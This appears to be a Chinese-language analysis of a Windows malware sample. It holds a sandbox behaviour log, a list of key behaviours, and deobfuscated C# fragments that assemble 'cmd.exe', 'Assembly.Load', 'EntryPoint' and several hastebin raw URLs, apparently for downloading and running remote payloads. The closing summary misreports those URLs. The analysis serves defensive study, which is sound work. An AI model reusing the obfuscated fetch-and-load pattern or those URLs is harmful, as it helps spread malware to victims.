C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:705, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_readdir, C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:44:721, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:3128, 4092, FILE_read, C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, offset:0x00000000 datalen:0x00001000 , 0x00000000 [操作成功完成。 ], 09:07:44:861, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, PROC_exec, C:\Windows\SysWOW64\WerFault.exe, target_pid:8492 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。 ], 09:07:44:861, WerFault.exe, 8492:0, 4092, EXEC_create, C:\Windows\SysWOW64\WerFault.exe, parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' image_base:0x0000000000A90000 image_size:0x0006F000 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp, , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:44:940, WerFault.exe, 8492:8588, 4092, FILE_truncate, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, eof:0x00000000 , 0x00000000 [操作成功完成。 ], 09:07:45:112, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, offset:0x00000000 datalen:0x00000020 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp, , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000001 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:144, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:0, 4092, EXEC_module_load, C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.737_none_4d637a531b9a7e51\comctl32.dll, base:0x0000000070060000 size:0x0020F000 , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:158, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp, access:0x00120089 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp, , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, access:0x0012019F alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000002 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, offset:0x00000000 datalen:0x00001306 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:45:174, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Users\bonelee\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs, filter:'*' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:8024, 4092, REG_mkkey, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData, access:0x0002001B , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:8024, 4092, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\ClockTimeSeconds, type:0x0000000B datalen:8 data:'61 96 EE 64 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:45:221, WerFault.exe, 8492:8024, 4092, REG_setval, HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\IdentityCRL\ClockData\TickCount, type:0x0000000B datalen:8 data:'0C 8F 01 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ], 09:07:45:237, WerFault.exe, 8492:6220, 4092, FILE_readdir, C:\Windows\SysWOW64\drivers, filter:'*.mrk' , 0x00000000 [操作成功完成。 ], 09:07:45:361, WerFault.exe, 8492:8024, 4092, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_readdir, C:\ProgramData\Microsoft\Windows\WER\ReportQueue, filter:'*_*_*_*_*' , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0, access:0x00100001 alloc_size:0 attrib:0x00000080 share_access:0x00000003 disposition:0x00000002 options:0x00200021 , 0x00000000 [操作成功完成。 ], 09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_touch, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, access:0x00120196 alloc_size:0 attrib:0x00000080 share_access:0x00000000 disposition:0x00000005 options:0x00000060 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_chmod, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, attrib:0x00002080 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_write, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:8588, 4092, FILE_read, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, offset:0x00000000 datalen:0x00000002 , 0x00000000 [操作成功完成。 ], 09:07:46:408, WerFault.exe, 8492:0, 4092, FILE_modified, C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_KD3BXVJZ3C4ZEDJL_f8fc1d736cd227c909efa10eb1f9d9c5d4c6ca5_daa1427c_212d93a0\Report.wer, , 0x00000000 [操作成功完成。 ], 09:07:46:424, WerFault.exe, 8492:0, 4092, EXEC_destroy, C:\Windows\SysWOW64\WerFault.exe, parent_pid:4092 cmdline:'C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 1904' , 0x00000000 [操作成功完成。 ], 09:07:46:424, 99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, 4092:0, 4092, EXEC_destroy, C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe, parent_pid:7920 cmdline:'C:\Users\bonelee\Desktop\99cc3ed45ab5f25cc7131de81f5084d476b04afa9def647a0a7d20f1beb95adb.exe' , 0x00000000 [操作成功完成。 ],
关键行为:
1、09:07:41:858, cmd.exe, 6308:0, 4092, EXEC_create, C:\Windows\SysWOW64\cmd.exe, parent_pid:4092 cmdline:'"C:\Windows\System32\cmd.exe" /c timeout 4.769' image_base:0x0000000000FE0000 image_size:0x00059000 , 0x00000000 [操作成功完成。 ],
2、09:07:41:952, timeout.exe, 8672:0, 4092, EXEC_create, C:\Windows\SysWOW64\timeout.exe, parent_pid:6308 cmdline:'timeout 4.769' image_base:0x0000000000020000 image_size:0x0000A000 , 0x00000000 [操作成功完成。 ],
3、创建和删除了好些临时文件:
4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8DF3.tmp.dmp, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EBF.tmp.WERInternalMetadata.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDF.tmp.xml, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EDD.tmp.csv, , 0x00000000 [操作成功完成。 ],
09:07:46:393, WerFault.exe, 8492:8588, 4092, FILE_remove, C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EFD.tmp.txt, , 0x00000000 [操作成功完成。 ],
看下其代码(已经反混淆):
// Token: 0x06000005 RID: 5 RVA: 0x00002052 File Offset: 0x00000252
public static string smethod_2()
{
return string.Format("{0}{1}{2}{3}", new object[]
{
"1",
"7",
"6",
"9"
});
}
// Token: 0x06000006 RID: 6 RVA: 0x000025F4 File Offset: 0x000007F4
public static string smethod_3()
{
return string.Format("{0}{1}{2}{3}{4}{5}{6}", new object[]
{
"c",
"m",
"d",
".",
"e",
"x",
"e"
});
}
// Token: 0x06000007 RID: 7 RVA: 0x0000264C File Offset: 0x0000084C
public static string smethod_4()
{
return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}", new object[]
{
"A",
"s",
"s",
"e",
"m",
"b",
"l",
"y"
});
}
// Token: 0x06000008 RID: 8 RVA: 0x00002084 File Offset: 0x00000284
public static string smethod_5()
{
return string.Format("{0}{1}{2}{3}", new object[]
{
"L",
"o",
"a",
"d"
});
}
// Token: 0x06000009 RID: 9 RVA: 0x000026AC File Offset: 0x000008AC
public static string smethod_6()
{
return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}", new object[]
{
"E",
"n",
"t",
"r",
"y",
"P",
"o",
"i",
"n",
"t"
});
}
// Token: 0x0600000A RID: 10 RVA: 0x0000271C File Offset: 0x0000091C
public static string smethod_7()
{
return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}{16}{17}{18}{19}{20}{21}{22}{23}{24}{25}{26}{27}{28}{29}{30}{31}{32}{33}{34}{35}{36}{37}{38}{39}{40}{41}{42}{43}{44}{45}{46}{47}{48}{49}{50}{51}{52}{53}{54}{55}{56}{57}{58}{59}{60}{61}{62}{63}{64}{65}{66}{67}{68}{69}{70}{71}{72}{73}{74}{75}{76}{77}{78}{79}{80}{81}{82}{83}{84}{85}{86}{87}{88}{89}{90}{91}{92}{93}{94}{95}{96}{97}{98}{99}{100}{101}{102}{103}{104}{105}{106}{107}{108}{109}{110}{111}{112}{113}{114}{115}{116}{117}{118}{119}{120}{121}{122}{123}{124}{125}{126}{127}{128}{129}{130}{131}{132}{133}{134}{135}{136}{137}{138}{139}{140}{141}{142}{143}{144}{145}{146}{147}{148}{149}{150}{151}{152}{153}{154}{155}{156}{157}{158}{159}{160}{161}{162}{163}{164}{165}{166}{167}{168}{169}{170}{171}{172}{173}{174}{175}{176}{177}{178}{179}{180}{181}{182}{183}{184}{185}{186}{187}{188}{189}{190}{191}{192}{193}{194}{195}{196}{197}{198}{199}{200}{201}{202}{203}{204}{205}{206}{207}{208}{209}{210}{211}{212}{213}{214}{215}{216}{217}{218}{219}{220}{221}{222}{223}{224}{225}{226}{227}{228}{229}{230}{231}{232}{233}{234}{235}{236}{237}{238}{239}{240}{241}{242}{243}{244}{245}{246}{247}{248}{249}{250}{251}{252}{253}{254}{255}{256}{257}{258}{259}{260}{261}{262}", new object[]
{
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"y",
"o",
"n",
"o",
"z",
"i",
"l",
"a",
"c",
"e",
"@",
"@",
"@",
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"u",
"r",
"a",
"l",
"a",
"p",
"u",
"v",
"u",
"h",
"@",
"@",
"@",
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"e",
"p",
"u",
"k",
"u",
"b",
"a",
"q",
"u",
"b",
"@",
"@",
"@",
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"o",
"s",
"a",
"j",
"o",
"r",
"o",
"z",
"i",
"w",
"@",
"@",
"@",
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"e",
"q",
"e",
"d",
"o",
"c",
"e",
"f",
"e",
"x",
"@",
"@",
"@",
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"a",
"j",
"i",
"f",
"u",
"y",
"i",
"j",
"e",
"z",
"@",
"@",
"@",
"h",
"t",
"t",
"p",
"s",
":",
"/",
"/",
"h",
"a",
"s",
"t",
"e",
"b",
"i",
"n",
".",
"c",
"o",
"m",
"/",
"r",
"a",
"w",
"/",
"e",
"s",
"u",
"r",
"i",
"j",
"a",
"k",
"a",
"d"
});
}
// Token: 0x0600000B RID: 11 RVA: 0x000020B6 File Offset: 0x000002B6
public static string smethod_8()
{
return string.Format("{0}{1}{2}", new object[]
{
"@",
"@",
"@"
});
}
smethod_2: 返回字符串 "1769"smethod_3: 返回字符串 "cmd.exe"smethod_4: 返回字符串 "Assembly"smethod_5: 返回字符串 "Load"smethod_6: 返回字符串 "EntryPoint"smethod_7: 返回一个非常长的字符串,包含多次重复的 "http://haste...xyz", "http://haste...uhabqub" 和 "http://haste...ikad"smethod_8: 返回一个字符串 "@@@"
